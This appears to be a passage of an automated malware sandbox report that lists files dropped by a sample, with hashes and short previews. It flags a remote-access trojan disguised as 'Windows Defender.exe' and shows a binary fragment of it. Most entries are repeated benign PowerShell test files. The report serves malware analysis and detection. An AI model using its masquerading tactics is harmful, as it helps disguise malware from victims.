                                                  C:\Users\user\AppData\Local\Temp\Nursultan by fruktoozik.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):13655
                                                  Entropy (8bit):5.088566979859528
                                                  Encrypted:false
                                                  SSDEEP:96:TDbN390UNQ8Io+PqiQ8Io+PAdaQ8Io+P6XFQ8Io+PFZOTG3fM0C7Io+CyQ8Io+PC:zfNQoiQ+aQSQLZPQXZJ0QXZ9QXZJh
                                                  MD5:CF2C57C607142D3400E4DC4DAEE81B3B
                                                  SHA1:7E05DF36B33CA5B6E4B4BA6420A5D57D3852F102
                                                  SHA-256:EB3072547DF8FDC1E5E5949713ACA0C813A2AF363C5570032F3C431BFDCD55C6
                                                  SHA-512:D4DEB09CF96E17036878707D595AF553708BB93CDB630B48E2101907572F4D48DEBF718CA32A90BCF40F761AB577CD51AD11A3D243A985A344621A6BAEBD33B9
                                                  Malicious:false
                                                  Preview:::[Bat To Exe Converter]..::..::YAwzoRdxOk+EWAnk..::fBw5plQjdG8=..::YAwzuBVtJxjWCl3EqQJgSA==..::ZR4luwNxJguZRRnk..::Yhs/ulQjdF+5..::cxAkpRVqdFKZSzk=..::cBs/ulQjdF65..::ZR41oxFsdFKZSDk=..::eBoioBt6dFKZSTk=..::cRo6pxp7LAbNWATEpCI=..::egkzugNsPRvcWATEpCI=..::dAsiuh18IRvcCxnZtBJQ..::cRYluBh/LU+EWAnk..::YxY4rhs+aU+JeA==..::cxY6rQJ7JhzQF1fEqQJQ..::ZQ05rAF9IBncCkqN+0xwdVs0..::ZQ05rAF9IAHYFVzEqQJQ..::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=..::fBEirQZwNQPfEVWB+kM9LVsJDGQ=..::cRolqwZ3JBvQF1fEqQJQ..::dhA7uBVwLU+EWDk=..::YQ03rBFzNR3SWATElA==..::dhAmsQZ3MwfNWATElA==..::ZQ0/vhVqMQ3MEVWAtB9wSA==..::Zg8zqx1/OA3MEVWAtB9wSA==..::dhA7pRFwIByZRRnk..::Zh4grVQjdCyDJGyX8VAjFKq6/eQy7FeeCaIS5Of66/m7rFgPXelxfZfeug==..::YB416Ek+ZG8=..::..::..::978f952a14a936cc963da21a135fa983..@ECHO OFF..chcp 65001<nul..title ...... .. ....... [Nurik]..:A..cls..echo...echo. /$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$$ /$$$$$$ /$$ /$$..echo. . $$$ . $$. $$ . $$. $$__ $$ /$$__ $$. $$

                                                  C:\Users\user\AppData\Local\Temp\Windows Defender.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):87552
                                                  Entropy (8bit):5.981787823477636
                                                  Encrypted:false
                                                  SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                                  MD5:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  SHA1:3269C423EBC616270BF713010B3C87976D07D06A
                                                  SHA-256:576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
                                                  SHA-512:7468AEB3D286C7D47DB80221C13B8A22D886566611E4A0C4F924E9B7CCA3B9E95C0F1FAAA071ABA2A60E9E4EB1022C6650ACB4D3A0547293910010A502393098
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                  Joe Sandbox View:
                                                  • Filename: Windows Defender.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@..................................D..O....`..B+........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc...B+...`...,...(..............@..@.reloc...............T..............@..B.................D......H........c..........&.....................................................(....*.r...p*. *p{.*..(....*.r...p*. .O..*.s.........s.........s.........s.........*.rc..p*. ...*.r...p*. .%..*.r...p*. X...*.rL..p*. .g..*.r...p*. ..e.*..((...*.r...p*. .(T.*.r+..p*. ..<.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*.r...p*. .5..*.r$..p*. G...*.r...p*. ~.H.*.rj..p*. .L..*.r...p*. .x!.*.r...p*. .^

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_153adawq.rww.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tabp3yi.0z2.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2z3kwouv.uxf.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_310wevqq.mq5.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m0f3ufn.yjj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3p23iqby.njd.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ah0ntmup.nog.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bakzojbf.n2v.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvd1lp44.zwp.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crse2sov.lui.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbktxfw3.yln.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_didt0foy.mij.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fi1s4f5o.50c.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hd4b54el.4pz.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkx1hao5.okz.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqecefwc.qg0.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l121kadt.pet.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4gbtcen.ycp.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhwewkpo.zac.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obr4o2cp.zqh.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ox1ghied.1hk.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdw5b5zr.noa.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfuq4pg4.wfz.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnyca14o.jx5.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruwsh3it.4xv.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqw2nxgt.12p.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
